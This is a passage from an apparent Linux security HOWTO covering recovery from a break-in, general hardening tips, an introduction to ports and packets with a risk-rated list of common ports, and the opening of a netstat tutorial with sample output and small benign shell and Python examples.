Some interesting discussions on issues surrounding forensics can be found at
[http://www.fish.com/security/] http://www.fish.com/security/. There is also
a collection of tools available, aptly called "The Coroner's Toolkit" (TCT).
Read below for steps on recovering from an intrusion.
-----------------------------------------------------------------------------
6.3. Reclaiming a Compromised System
So now you've confirmed a break-in, and know that someone else has root
access, and quite likely one or more hidden backdoors to your system. You've
lost control. How to clean up and regain control?
There is no sure fire way of doing this short of a complete re-install. There
is no way to find with assurance all the modified files and backdoors that
may have been left. Trying to patch up a compromised system risks a false
sense of security and may actually aggravate an already bad situation.
The steps to take, in this order:
  * Pull the plug and disconnect the machine. You may be unwittingly
participating in criminal activity, and doing to others what has been
done to you.
  * Depending on the needs of the situation and time available to restore the
system, it is advantageous to learn as much as you can about how the
attacker got in, and what was done in order to plug the hole and avoid a
recurrence. This could conceivably be time consuming, and is not always
feasible. And it may require more expertise than the typical user
possesses.
  * Backup important data. Do not include any system files in the backup,
nor system configuration files like inetd.conf. Limit the backup to personal
data files only! You don't want to backup, then restore something that
might open a backdoor or other hole.
  * Re-install from scratch, and reformat the drive during the installation (
mke2fs) to make sure no remnants are hiding. Actually, replacing the
drive is not a bad idea. Especially, if you want to keep the compromised
data available for further analysis.
  * Restore from backups. After a clean install is the best time to install
an IDS (Intrusion Detection System) such as tripwire ([http://
www.tripwire.org] http://www.tripwire.org).
  * Apply all updates from [ftp://updates.redhat.com] ftp://
updates.redhat.com.
  * Re-examine your system for unnecessary services. Re-examine your firewall
and access policies, and tighten all holes. Use new passwords, as these
were stolen in all likelihood.
  * Re-connect system ;-)
At this time, any rootkit cleanup tools that may be available on-line are not
recommended. They probably do work just fine most of the time. But again, how
to be absolutely sure that all is well and all vestiges of the intrusion are
gone?
-----------------------------------------------------------------------------
7. General Tips
This section will quickly address some general concepts for maintaining a
more secure and reliable system or network. Let's emphasize "maintaining"
here since computer systems change daily, as does the environment around
them. As mentioned before, there isn't any one thing that makes a system
secure. There are too many variables. Security is an approach and an attitude
more than it is a reliance on any particular product, application or specific
policy.
  * Do not allow remote root logins. This may be controlled by a
configuration file such as /etc/securetty. Remove any lines that begin
"pts". This is one big security hole.
  * In fact, don't log in as root at all. Period. Log in on your user account
and su to root when needed. Whether the login is remote or local. Or use
sudo, which can run individual commands with root privileges. (Red Hat
includes a sudo package.) This takes some getting used to, but it is the
"right" way to do things. And the safest. And it will become a more and
more natural way of doing things as time goes on.
I know someone is saying right now "but that is so much trouble, I am
root, and it is my system". True, but root is a specialized account that
was not ever meant to be used as a regular user account. Root has access
to everything, even hardware devices. The system "trusts" root. It
believes that you know what you are doing. If you make a mistake, it
assumes that you meant it, and will do its best to do what you told it
to do...even if that destroys the system!
As an example, let's say you start X as root, open Netscape, and visit a
web site. The web page has badly behaved JavaScript. And conceivably now
that badly written JavaScript might have access to much more of your
system than if you had done it the "right" way.
  * Take passwords seriously. Don't give them out to anyone. Don't use the
same one for everything. Don't use root's password for anything else --
except root's password! Never sign up or register on line, using any of
your system passwords. Passwords should be a combination of mixed case
letters, numbers and/or punctuation and a reasonable length (eight
characters or longer). Don't use so-called "dictionary" words that are
easy to guess like "cat" or "dog". Don't incorporate personal information
like names or dates or hostnames. Don't write down system passwords --
memorize them.
Use the more secure "shadow" passwords. This has been the default on Red
Hat for some time now. If the file /etc/shadow exists, then it is enabled
already. The commands pwconv and grpconv, can be used to convert password
and group files to shadow format if available.
  * Avoid using programs that require clear text logins over untrusted
networks like the Internet. Telnet is a prime example. ssh is much
better. If there is any support for SSL (Secure Socket Layers), use it.
For instance, does your ISP offer POP or IMAP mail via SSL? Recent Red
Hat releases do include [http://www.openssl.org/] openssl, and many Linux
applications can use SSL where support is available.
  * Set resource limits. There are various ways to do this. The need for this
probably increases with the number of users accessing a given system. Not
only does setting limits on such things as disk space prevent intentional
mischief, it can also help with unintentionally misbehaved applications
or processes. quota (man quota) can be used to set disk space limits.
Bash includes the ulimit command (man ulimit or man bash), that can limit
various functions on a per user basis.
Also, not discussed here at any length, but PAM (Pluggable Authentication
Modules) has a very sophisticated approach to controlling various system
functions and resources. See man pam to get started. PAM is configured
via either /etc/pam.conf or /etc/pam.d/*. Also files in /etc/security/*,
including /etc/security/limits.conf, where again various sane limits can
be imposed. An in depth look at PAM is beyond the scope of this document.
The User-Authentication HOWTO ([http://tldp.org/HOWTO/
User-Authentication-HOWTO/index.html] http://tldp.org/HOWTO/
User-Authentication-HOWTO/index.html) has more on this.
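A quick illustration of ulimit (the value is arbitrary, and a child shell is
used so your own session is unaffected):

```shell
# Lower the soft limit on open file descriptors in a child shell, then print
# it back. Soft limits can be lowered by any user, but raised only by root
# (up to the hard limit).
bash -c 'ulimit -S -n 256; ulimit -S -n'
```

This should print 256, assuming the hard limit is at least that high. For
persistent, per-user limits, /etc/security/limits.conf is the place to look.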
  * Make sure someone with a clue is getting root's mail. This can be done
with an "alias". Typically, the mail server will have a file such as /etc
/aliases where this can be defined. This can conceivably be an account on
another machine if need be:
+---------------------------------------------------------------+
| |
| # Person who should get root's mail. This alias |
| # must exist. |
| # CHANGE THIS LINE to an account of a HUMAN |
| root: hal@bigcat |
| |
| |
+---------------------------------------------------------------+
Remember to run newaliases (or equivalent) afterward.
  * Be careful where you get software. Use trusted sources. How well do you
trust complete strangers? Check Red Hat's ftp site (or mirrors) first if
looking for a specific package. It will probably be best suited for your
system any way. Or, the original package's project site is good as well.
Installing from raw source (either tarball or src.rpm) at least gives you
the ability to examine the code. Even if you don't understand it ;-)
While this does not seem to be a wide spread problem with Linux software
sites, it is very trivial for someone to add a very few lines of code,
turning that harmless looking binary into a "Trojan horse" that opens a
backdoor to your system. Then the jig is up.
  * So someone has scanned you, probed you, or otherwise seems to want into
your system? Don't retaliate. There is a good chance that the source IP
address is a compromised system, and the owner is a victim already. Also,
you may be violating someone's Terms of Service, and have trouble with
your own ISP. The best you can do is to send your logs to the abuse
department of the source IP's ISP, or owner. This is often something like
"abuse@someisp.com". Just don't expect to hear much back. Generally
speaking, such activity is not legally criminal, unless an actual
break-in has taken place. Furthermore, even if criminal, it will never be
prosecuted unless significant damage (read: big dollars) can be shown.
  * Red Hat users can install the "Bastille Hardening System", [http://
www.bastille-linux.org/] http://www.bastille-linux.org/. This is a
multi-purpose system for "hardening" Red Hat and Mandrake system
security. It has a GUI interface which can be used to construct firewall
scripts from scratch and configure PAM among many other things. Debian
support is new.
  * So you have a full-time Internet connection via cable-modem or DSL. But
do you always use it, or always need it? There's an old saying that "the
only truly secure system, is a disconnected system". Well, that's
certainly one option. So take that interface down, or stop the
controlling daemon (dhcpcd, pppoed, etc). Or possibly even set up cron
jobs to bring your connection up and down according to your normal
schedule and usage.
  * What about cable and DSL routers that are often promoted as "firewalls"?
The lower priced units mostly equate NAT (Network Address Translation),
together with the ability to open holes for ports through it, with a
firewall. While NAT itself does provide a fair degree of security for
the systems behind the NAT gateway, this constitutes only a very
rudimentary firewall. And if holes are opened, there is still exposure.
Also, you are relying on the router's firmware and implementation not to
be flawed. It is wise to have some kind of additional protection behind
such routers.
  * What about wireless network cards and hubs? Insecure, despite what the
manufacturers may claim. Treat these connections just as you would an
Internet connection. Use secure protocols like ssh only! Even if it is
just one LAN box to another.
  * If you find you need to run a particular service, and it is for just you,
or maybe a relatively small number of people, use a non-standard port.
Most server daemons support this. For instance, sshd runs on port 22 by
default. All worms and script kiddies will expect it there, and look for
it there. So, run it on another port! See the sshd man page.
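As a sketch, moving sshd to a non-standard port is a one-line change in
sshd_config (the path and the port number here are just examples; adjust
for your distribution):

```
# /etc/ssh/sshd_config (path may vary by distribution)
# Listen on an arbitrary unprivileged port instead of the default 22.
# 2222 is only an example -- pick something not already in use.
Port 2222
```

After restarting sshd, clients would then connect with "ssh -p 2222 host".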
  * What about firewalls that block Internet connections according to the
application (like ZoneAlarm from Windowsdom)? These were designed with
this feature primarily because of the plethora of viruses and trojans
that are so common with MS operating systems. This is really not a
problem on Linux, so no such application exists on Linux at this time,
and there does not seem to be enough demand for it that someone has
taken the time to implement it. A better firewall can be had on Linux by
following the other suggestions in this document.
  * Lastly, know your system! Let's face it, if you are new to Linux, you
can't already know something you have never used. Understood. But in the
process of learning, learn how to do things the right way, not the
easiest way. There are several decades of history behind "the right way"
of doing things, and it has stood the test of time. What may seem
unnecessary or burdensome now will make sense in due time.
Be familiar with whatever services you are running, and the implications
these services might have for the overall health of your system if
something does go wrong. Read what you can, and ask questions. Don't run
something as a service "just because I can", or because the installer put
it there. Clearly, you can't start out as an experienced System
Administrator. But you can work to learn enough about your own system
that you are in control. This is one thing that separates *nix from MS
systems: we can never be in complete control with MS, but we can with
*nix. Conversely, if something bad happens, we often have no one else to
blame.
-----------------------------------------------------------------------------
8. Appendix
8.1. Servers, Ports, and Packets
Let's take a quick, non-technical look at some networking concepts, and how
they can potentially impact our own security. We don't need to know much
about networking, but a general idea of how things work is certainly going to
help us with firewalls and other related issues.
As you may have noticed, Linux is a very network-oriented operating system.
Much is done by connecting to "servers" of one type or another -- X servers,
font servers, print servers, etc.
Servers provide "services", which provide various capabilities, both to the
local system and potentially to other remote systems. The same server
generally serves both. Some servers work quietly behind the scenes,
and others are more interactive by nature. We may only be aware of a print
server when we need to print something, but it is there running, listening,
and waiting for connection requests whether we ever use it or not (assuming
of course we have it enabled). A typical Linux installation will have many,
many types of servers available to it. Default installations often will turn
some of these "on".
And even if we are not connected to a real network all the time, we are still
"networked" so to speak. Take our friendly local X server for instance. We
may tend to think of this as just providing a GUI interface, which is only
true to a point. It does this by "serving" to client applications, and thus
is truly a server. But X Windows is also capable of serving remote clients
over a network -- even large networks like the Internet. Though we probably
don't really want to be doing this ;-)
And yes, if you are not running a firewall or have not taken other
precautions, and are connected to the Internet, it is quite possible that
someone -- anyone -- could connect to your X server. X11 "listens" on TCP
"port" 6000 by default. This principle applies to most other servers as well
-- they can be easily connected to, unless something is done to restrict or
prevent connections.
In TCP/IP (Transmission Control Protocol/Internet Protocol) networks like we
are talking about with Linux and the Internet, every connected computer has a
unique "IP Address". Think of this like a phone number. You have a phone
number, and in order to call someone else, you have to know that phone
number, and then dial it. The phone numbers have to be unique for the system
to work. IP addresses are generally expressed in "dotted quad" notation, e.g.
152.19.254.81.
On this type of network, servers are said to "listen". This means that they
have a "port" opened, and are awaiting incoming connections to that port.
Connections may be local, as is typically the case with our X server, or
remote -- meaning from another computer "somewhere". So servers "listen" on a
specific "port" for incoming connections. Most servers have a default port,
such as port 80 for web servers. Or 6000 for X11. See /etc/services for a
list of common ports and their associated service.
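The listen-and-connect cycle described above can be sketched in a few lines
of Python. This is a hypothetical illustration, not tied to any particular
daemon; it uses the loopback interface and lets the kernel pick a free port:

```python
import socket

# A server binds a port and listens, just like any daemon; here we use
# 127.0.0.1 and port 0 (meaning: kernel, pick any free port for us).
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))
server.listen(1)
host, port = server.getsockname()

# A client connects to that host:port pair, just as a browser would
# connect to port 80 on a web server.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
conn, peer = server.accept()

# Data now flows over the established connection.
conn.sendall(b"hello")
data = client.recv(5)
print(data)                        # b'hello'

client.close(); conn.close(); server.close()
```

The same pattern, with a well-known port number and a remote address,
is what every web, mail, or FTP transaction boils down to.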
The "port" is actually just an address in the kernel's networking stack, and
is a method that TCP, and other protocols, use to organize connections and
the exchange of data between computers. There are a total of 65,536 TCP and
UDP ports available, though usually only a few of these are in use at
any one time. These are classified as "privileged", those ports below 1024,
and "unprivileged", 1024 and above. Most servers use the privileged ports.
Only one server may listen on, or "bind" to, a port at a time, though that
server may well be able to handle multiple connections via that one port.
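The one-server-per-port rule can be demonstrated directly: a second attempt
to bind an already-bound port fails with "address already in use". A small
Python sketch (port numbers are arbitrary; the kernel picks one for us):

```python
import errno
import socket

# The first socket takes ownership of a port.
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.bind(("127.0.0.1", 0))          # kernel assigns a free port
s1.listen(1)
port = s1.getsockname()[1]

# A second socket cannot bind the same port while the first holds it.
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s2.bind(("127.0.0.1", port))
    in_use = False
except OSError as e:
    in_use = (e.errno == errno.EADDRINUSE)
print("address already in use:", in_use)

s1.close(); s2.close()
```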
Computers talk to each other via these "port" connections. One computer will
open a connection to a "port" on another computer, and thus be able to
exchange data via the connection that has been established between their
respective ports.
Getting back to the phone analogy, and stretching it a bit, think of calling
a large organization with a complex phone system. The organization has many
"departments": sales, shipping, billing, receiving, customer service, R&D,
etc. Each department has its own "extension" number. So the shipping
department might be extension 21, sales might be extension 80, and so on.
The main phone number is the IP Address, and the department's extension is
the port in this analogy. The "department's" number is always the same when
we call. And generally they can handle many simultaneous incoming calls.
The data itself is contained in "packets", which are small chunks of data,
generally 1500 bytes or less each. Packets are used to control and organize
the connection, as well as carry data. There are different types of packets.
Some are specifically used for controlling the connection, and then some
packets carry our data as their payload. If there is a lot of data, it will
be broken up into multiple packets, which is almost always how it works. The
packets will be transmitted one at a time, and then "re-assembled" at the
other end. One web page for instance, will take many packets to transmit --
maybe hundreds or even thousands. This all happens very quickly and
transparently.
We can see a typical connection between two computers in this one line
excerpt from netstat output:
+---------------------------------------------------------------------------+
| tcp 30 0 169.254.179.139:1359 18.29.1.67:21 CLOSE_WAIT |
| |
| |
+---------------------------------------------------------------------------+
The interesting part is the IP addresses and ports in the fourth and fifth
columns. The port is the number just to the right of the colon. The left side
of the colon is the IP address of each computer. The fourth column is the
local address, or our end of the connection. In the example, 169.254.179.139
is the IP address assigned by my ISP. It is connected to port 21 (FTP) on
18.29.1.67, which is rpmfind.net. This is just after an FTP download from
rpmfind.net. Note that while I am connected to their FTP server on their port
21, the port on my end that is used by my FTP client is 1359. This is a
randomly assigned "unprivileged" port, used for my end of the two-way
"conversation". The data moves in both directions: me:port#1359 <-> them:port
#21. The FTP protocol is actually a little more complicated than this, but we
won't delve into the finer points here. The CLOSE_WAIT is the TCP state of
the connection at this particular point in time. Eventually the connection
will close completely on both ends, and netstat will not show anything for
this.
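The fields of a netstat line like the sample above can also be pulled apart
programmatically. A small Python sketch, using that same sample line as
input:

```python
# Split the sample netstat line into its whitespace-separated fields.
line = "tcp 30 0 169.254.179.139:1359 18.29.1.67:21 CLOSE_WAIT"
proto, recv_q, send_q, local, remote, state = line.split()

# Each address field is "ip:port"; split on the last colon.
local_ip, local_port = local.rsplit(":", 1)
remote_ip, remote_port = remote.rsplit(":", 1)

print(local_ip, local_port)      # 169.254.179.139 1359
print(remote_ip, remote_port)    # 18.29.1.67 21
print(proto, state)              # tcp CLOSE_WAIT
```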
The "unprivileged" port that is used for my end of the connection, is
temporary and is not associated with a locally running server. It will be
closed by the kernel when the connection is terminated. This is quite
different than the ports that are kept open by "listening" servers, which are
permanent and remain "open" even after a remote connection is terminated.
So to summarize using the above example, we have client (me) connecting to a
server (rpmfind.net), and the connection is defined and controlled by the
respective ports on either end. The data is transmitted and controlled by
packets. The server is using a "privileged" port (i.e. a port below number
1024) which stays open listening for connections. The "unprivileged" port
used on my end by my client application is temporary, is only opened for the
duration of the connection, and only responds to the server's port at the
other end of the connection. This type of port is not vulnerable to attacks
or break-ins generally speaking. The server's port is vulnerable since it
remains open. The administrator of the FTP server will need to take
appropriate precautions to ensure that his server is secure. Other Internet
connections, such as to web servers or mail servers, work similarly to the
above example, though the server ports are different. SMTP mail servers use
port 25, and web servers typically use port 80. See the Ports section for
other commonly used ports and services.
One more point on ports: ports are only accessible if there is something
listening on that port. No one can force a port open if there is no service
or daemon listening there, ready to handle incoming connection requests. A
closed port is a totally safe port.
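This can be seen directly: connecting to a port with no listener is simply
refused by the kernel. A Python sketch (the port number is arbitrary; we
grab a free one and close it, so nothing is listening there):

```python
import socket

# Obtain a port number that currently has no listener: bind an
# ephemeral port, note its number, then close the socket.
probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
probe.bind(("127.0.0.1", 0))
port = probe.getsockname()[1]
probe.close()

# With nothing listening on that port, the connection is refused.
try:
    socket.create_connection(("127.0.0.1", port), timeout=2)
    refused = False
except ConnectionRefusedError:
    refused = True
print("connection refused:", refused)
```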
And a final point on the distinction between clients and servers. The example
above did not have a telnet or ftp server in the LISTENER section in the
netstat example above. In other words, no such servers were running locally.
You do not need to run a telnet or ftp server daemon in order to connect to
somebody else's telnet or ftp server. These are only for providing these
services to others that would be making connections to you, which you don't
really want to be doing in most cases. This in no way affects the ability to
use telnet and ftp client software.
-----------------------------------------------------------------------------
8.2. Common Ports
A quick rundown of some commonly seen and used ports, with the commonly
associated service name, and risk factor. All have some risk. It is just that
some have historically had more exploits than others. That is how they are
evaluated below, and not necessarily to be interpreted as whether any given
service is safe or not.
1-19, assorted protocols, many of which are antiquated, and probably none of
which are needed on a modern system. If you don't know what any of these are,
then you definitely don't need them. The echo service (port 7) should not be
confused with the common ping program. Leave all these off.
20 - FTP-DATA. "Active" FTP connections use two ports: 21 is the control
port, and 20 is where the data comes through. Passive FTP does not use port
20 at all. Low risk, but see below.
21 - FTP server port, aka File Transfer Protocol. A well-entrenched protocol
for transferring files between systems. Very high risk, and maybe the number
one crack target.
22 - SSH (Secure Shell), or sometimes PCAnywhere. Low to moderate risk (yes,
there are exploits even against so-called "secure" services).
23 - Telnet server. For LAN use only. Use ssh instead in non-secure
environments. Moderate risk.
25 - SMTP, Simple Mail Transfer Protocol, or mail server port, used for
sending outgoing mail, and transferring mail from one place to another.
Moderate risk. This has had a bad history of exploits, but has improved
lately.
37 - Time service. This is the built-in inetd time service. Low risk. For LAN
use only.
53 - DNS, or Domain Name Server port. Name servers listen on this port, and
answer queries for resolving host names to IP addresses. High Risk.
67 (UDP) - BOOTP, or DHCP, server port. Low risk. If using DHCP on your LAN,
this does not need to be exposed to the Internet.
68 (UDP) - BOOTP, or DHCP, client port. Low risk.
69 - tftp, or Trivial File Transfer Protocol. Extremely insecure. LAN only,
if really, really needed.
79 - Finger, used to provide information about the system, and logged in
users. Low risk as a crack target, but gives out way too much information and
should not be run.
80 - WWW or HTTP standard web server port. The most commonly used service on
the Internet. Low risk.
98 - Linuxconf web access administrative port. LAN only, if really needed at
all.
110 - POP3, aka Post Office Protocol, mail server port. POP mail is mail that
the user retrieves from a remote system. Low risk.
111 - sunrpc (Sun Remote Procedure Call), or portmapper port. Used by NFS
(Network File System), NIS (Network Information Service), and various related
services. Sounds dangerous and is high risk. LAN use only. A favorite crack
target.
113 - identd, or auth, server port. Used, and sometimes required, by some
older style services (like SMTP and IRC) to validate the connection. Probably
not needed in most cases. Low risk, but could give an attacker too much
information about your system.
119 -- nntp or news server port. Low risk.
123 - Network Time Protocol for synchronizing with time servers where a high
degree of accuracy is required. Low risk, but probably not required for most
users. rdate is an easier and more secure way of updating the system
clock. And then inetd's built-in time service for synchronizing LAN systems
is another option.
137-139 - NetBios (SMB) services. Mostly a Windows thing. Low risk on Linux,
but LAN use only. 137 is a very commonly seen port attempt. A rather
obnoxious protocol from Redmond that generates a lot of "noise", much of
which is harmless.
143 - IMAP, Internet Message Access Protocol. Another mail retrieval protocol.
Low to moderate risk.
161 - SNMP, Simple Network Management Protocol. More commonly used in routers
and switches to monitor statistics and vital signs. Not needed for most of
us, and low risk.
177 - XDMCP, the X Display Management Control Protocol for remote connections
to X servers. Low risk, but LAN only is recommended.
443 - HTTPS, a secure HTTP (WWW) protocol in fairly wide use. Low risk.
465 - SMTP over SSL, secure mail server protocol. Low risk.
512 (TCP) - exec is how it shows in netstat. Actually the proper name is
rexec, for Remote Execution. Sounds dangerous, and is. High risk, LAN only if
at all.
512 (UDP) - biff, a mail notification protocol. Low risk, LAN only.
513 - login, actually rlogin, aka Remote Login. No relation to the standard /
bin/login that we use every time we log in. Sounds dangerous, and is. High
risk, and LAN only if really needed.
514 (TCP) - shell is the nickname, and how netstat shows it. Actually, rsh is
the application for "Remote Shell". Like all the "r" commands, this is a
throwback to kinder, gentler times. Very insecure, so high risk, and LAN
only usage, if at all.
514 (UDP) - syslog daemon port, only used for remote logging purposes. The
average user does not need this. Probably low risk, but definitely LAN only
if really required.
515 - lp or print server port. High risk, and LAN only of course. Someone on
the other side of the world does not want to use your printer for its
intended purpose!
587 - MSA, or "submission", the Mail Submission Agent protocol. A new mail
handling protocol supported by most MTAs (mail servers). Low risk.
631 - the CUPS (print daemon) web management port. LAN only, low risk.
635 - mountd, part of NFS. LAN use only.
901 - SWAT, Samba Web Administration Tool port. LAN only.
993 - IMAP over SSL, secure IMAP mail service. Very low risk.
995 - POP over SSL, secure POP mail service. Very low risk.
1024 - This is the first "unprivileged" port, which is dynamically assigned
by the kernel to whatever application requests it. This can be almost
anything. Ditto for ports just above this.
1080 - Socks Proxy server. A favorite crack target.
1243 - SubSeven Trojan. Windows only problem.
1433 - MS SQL server port. A sometimes target. N/A on Linux.
2049 - nfsd, Network File Service Daemon port. High risk, and LAN usage only
is recommended.
3128 - Squid proxy server port. Low risk, but for most should be LAN only.
3306 - MySQL server port. Low risk, but for most should be LAN only.
5432 - PostgreSQL server port. LAN only, relatively low risk.
5631 (TCP), 5632 (UDP) - PCAnywhere ports. Windows only. PCAnywhere can be
quite "noisy", and broadcasts to wide address ranges.
6000 - X11 TCP port for remote connections. Low to moderate risk, but again,
this should be LAN only. Actually, this can include ports 6000-6009 since X
can support multiple displays and each display would have its own port. ssh's
X11Forwarding will start using ports at 6010.
6346 - gnutella.
6667 - ircd, Internet Relay Chat Daemon.
6699 - napster.
7100-7101 - Some font servers use these ports. Low risk, but LAN only.
8000 and 8080 - common web cache and proxy server ports. LAN only.
10000 - webmin, a web based system administration utility. Low risk at this
point.
27374 - SubSeven, a commonly probed for Windows only Trojan. Also, 1243.
31337 - Back Orifice, another commonly probed for Windows only Trojan.
More services and corresponding port numbers can be found in /etc/services.
Also, the "official" list is [http://www.iana.org/assignments/port-numbers]
http://www.iana.org/assignments/port-numbers.
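The name-to-port mapping in /etc/services can also be queried
programmatically; a Python sketch, assuming a standard /etc/services is
present on the system:

```python
import socket

# Look up well-known ports by service name, and vice versa, from the
# system services database (/etc/services on Linux).
print(socket.getservbyname("ssh", "tcp"))     # 22
print(socket.getservbyname("smtp", "tcp"))    # 25
print(socket.getservbyname("domain", "tcp"))  # 53
print(socket.getservbyport(22, "tcp"))        # ssh
```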
A great analysis of what probes to these and other ports might mean from
Robert Graham: [http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html. A very good reference.
Another point here: these are the standard port designations. There is no law
that says any service has to run on a specific port. Usually they do, but
they certainly don't always have to.
Just a reminder that when you see these types of ports in your firewall logs,
it is not anything to go off the deep end about. Not if you have followed
Steps 1-3 above, and verified your firewall works. You are fairly safe. Much
of this traffic may be "stray bullets" too -- Internet background noise,
misconfigured clients or routers, noisy Windows stuff, etc.
-----------------------------------------------------------------------------
8.3. Netstat Tutorial
8.3.1. Overview
netstat is a very useful utility for viewing the current state of your
network status -- what servers are listening for incoming connections, what
interfaces they listen on, who is connected to us, who we are connected to, and
so on. Take a look at the man page for some of the many command line options.
We'll just use a relative few options here.
As an example, let's check all currently listening servers and active
connections for both TCP and UDP on our hypothetical host, bigcat. bigcat is
a home desktop installation, with a DSL Internet connection in this example.
bigcat has two ethernet cards: one for the external connection to the ISP,
and one for a small LAN with an address of 192.168.1.1.
+--------------------------------------------------------------------------------+
| |
|$ netstat -tua |
|Active Internet connections (servers and established) |
|Proto Recv-Q Send-Q Local Address Foreign Address State |
|tcp 0 0 *:printer *:* LISTEN |
|tcp 0 0 bigcat:8000 *:* LISTEN |
|tcp 0 0 *:time *:* LISTEN |
|tcp 0 0 *:x11 *:* LISTEN |
|tcp 0 0 *:http *:* LISTEN |
|tcp 0 0 bigcat:domain *:* LISTEN |
|tcp 0 0 bigcat:domain *:* LISTEN |
|tcp 0 0 *:ssh *:* LISTEN |
|tcp 0 0 *:631 *:* LISTEN |
|tcp 0 0 *:smtp *:* LISTEN |
|tcp 0 1 dsl-78-199-139.s:1174 64.152.100.93:nntp SYN_SENT |
|tcp 0 1 dsl-78-199-139.s:1175 64.152.100.93:nntp SYN_SENT |
|tcp 0 1 dsl-78-199-139.s:1173 64.152.100.93:nntp SYN_SENT |
|tcp 0 0 dsl-78-199-139.s:1172 207.153.203.114:http ESTABLISHED |
|tcp 1 0 dsl-78-199-139.s:1199 www.xodiax.com:http CLOSE_WAIT |
|tcp 0 0 dsl-78-199-139.sd:http 63.236.92.144:34197 TIME_WAIT |
|tcp 400 0 bigcat:1152 bigcat:8000 CLOSE_WAIT |
|tcp 6648 0 bigcat:1162 bigcat:8000 CLOSE_WAIT |
|tcp 553 0 bigcat:1164 bigcat:8000 CLOSE_WAIT |
|udp 0 0 *:32768 *:* |
|udp 0 0 bigcat:domain *:* |
|udp 0 0 bigcat:domain *:* |
|udp 0 0 *:631 *:* |
| |
| |
+--------------------------------------------------------------------------------+
This output probably looks very different from what you get on your own
system. Notice the distinction between "Local Address" and "Foreign Address",
and how each includes a corresponding port number (or service name if
available) after the colon. "Local Address" is our end of the connection. The
first group with LISTEN in the far right hand column are services that are
running on this system. These are servers that are running in the background
on bigcat, and "listen" for incoming connections. So they have a port opened,
and this is where they "listen". These connections might come from the local
system (i.e. bigcat itself), or remote systems. This is very important
information to have! The others just below this are connections that have
been established from this system to other systems. The respective
connections are in varying states as indicated by the key words in the last
column. Those with no key word in the last column at the end are servers
responding to UDP connections. UDP is a different protocol from TCP
altogether, but is used for some types of low priority network traffic.
Now, the same thing with the "-n" flag to suppress converting to "names" so
we can actually see the port numbers:
+-----------------------------------------------------------------------------+
|$ netstat -taun |
|Active Internet connections (servers and established) |
|Proto Recv-Q Send-Q Local Address Foreign Address State |
|tcp 0 0 0.0.0.0:515 0.0.0.0:* LISTEN |
|tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN |
|tcp 0 0 192.168.1.1:53 0.0.0.0:* LISTEN |
|tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:631 0.0.0.0:* LISTEN |
|tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN |
|tcp 0 1 169.254.179.139:1174 64.152.100.93:119 SYN_SENT |
|tcp 0 1 169.254.179.139:1175 64.152.100.93:119 SYN_SENT |
|tcp 0 1 169.254.179.139:1173 64.152.100.93:119 SYN_SENT |
|tcp 0 0 169.254.179.139:1172 207.153.203.114:80 ESTABLISHED |
|tcp 1 0 169.254.179.139:1199 216.26.129.136:80 CLOSE_WAIT |
|tcp 0 0 169.254.179.139:80 63.236.92.144:34197 TIME_WAIT |
|tcp 400 0 127.0.0.1:1152 127.0.0.1:8000 CLOSE_WAIT |
|tcp 6648 0 127.0.0.1:1162 127.0.0.1:8000 CLOSE_WAIT |
|tcp 553 0 127.0.0.1:1164 127.0.0.1:8000 CLOSE_WAIT |
|udp 0 0 0.0.0.0:32768 0.0.0.0:* |
|udp 0 0 192.168.1.1:53 0.0.0.0:* |
|udp 0 0 127.0.0.1:53 0.0.0.0:* |
|udp 0 0 0.0.0.0:631 0.0.0.0:* |
| |
| |
+-----------------------------------------------------------------------------+
Let's look at the first few lines of this in detail. On line one,
+----------------------------------------------------------------------------+
| tcp 0 0 0.0.0.0:515 0.0.0.0:* LISTEN |
| |
| |
+----------------------------------------------------------------------------+
"Local Address" is 0.0.0.0, meaning "all" interfaces that are available. The
local port is 515, or the standard print server port, usually owned by the
lpd daemon. You can find a listing of common service names and corresponding
ports in the file /etc/services.
The fact that it is listening on all interfaces is significant. In this case,
that would be lo (localhost), eth0, and eth1. Printer connections could
conceivably be made over any of these interfaces. Should a user on this
system bring up a PPP connection, then the print daemon would be listening on
that interface (ppp0) as well. The "Foreign Address" is also 0.0.0.0, meaning
from "anywhere".
It is also worth noting here, that even though this server is telling the
kernel to listen on all interfaces, the netstat output does not reflect
whether there may be a firewall in place that may be filtering incoming
connections. We just can't tell that at this point. Obviously, for certain
servers, this is very desirable. Nobody outside your own LAN has any reason
whatsoever to connect to your print server port for instance.
Line two is a little different:
+----------------------------------------------------------------------------+
| tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN |
| |
| |
+----------------------------------------------------------------------------+
Notice the "Local Address" this time is localhost's address of 127.0.0.1.
This is very significant as only connections local to this machine will be
accepted. So only bigcat can connect to bigcat's TCP port 8000. The security
implications should be obvious. Not all servers have configuration options
that allow this kind of restriction, but it is a very useful feature for
those that do. Port 8000 in this example, is owned by the web proxy
Junkbuster.
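The difference between the two "Local Address" forms comes down to which
address the server handed to bind(). A Python sketch, mirroring the two
kinds of netstat entries:

```python
import socket

# Bind one socket to the loopback address only -- reachable solely
# from this machine, like the 127.0.0.1:8000 entry above.
local_only = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_only.bind(("127.0.0.1", 0))
local_only.listen(1)
lo_addr = local_only.getsockname()[0]

# Bind another to the 0.0.0.0 wildcard -- listening on every
# interface, like the 0.0.0.0:515 entry.
all_ifaces = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
all_ifaces.bind(("0.0.0.0", 0))
all_ifaces.listen(1)
any_addr = all_ifaces.getsockname()[0]

# netstat would show these as 127.0.0.1:port and 0.0.0.0:port.
print(lo_addr)     # 127.0.0.1
print(any_addr)    # 0.0.0.0

local_only.close(); all_ifaces.close()
```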
With the next three entries, we are back to listening on all available
interfaces:
